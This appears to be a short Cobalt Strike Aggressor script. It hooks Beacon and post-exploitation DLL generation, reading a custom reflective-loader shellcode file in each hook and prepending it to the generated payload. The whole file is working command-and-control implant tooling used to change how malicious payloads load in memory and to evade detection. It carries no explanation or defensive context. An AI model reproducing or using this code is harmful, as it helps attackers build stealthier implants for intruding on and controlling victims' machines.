set BEACON_RDLL_GENERATE {
    $handle_udrl = openf(script_resource("beacon/bin/shellcode.bin"));
    $data = readb($handle_udrl, -1);
    closef($handle_udrl);

    println("Generate beacon with UDRL ! Udrl size : " . strlen($data));

    return $data . $2;
}

set POSTEX_RDLL_GENERATE {
    $handle_udrl = openf(script_resource("postex/bin/shellcode.bin"));
    $data = readb($handle_udrl, -1);
    closef($handle_udrl);

    println("Generate post-ex DLL with custom udrl ! Udrl size : " . strlen($data));

    return $data . $2;
}
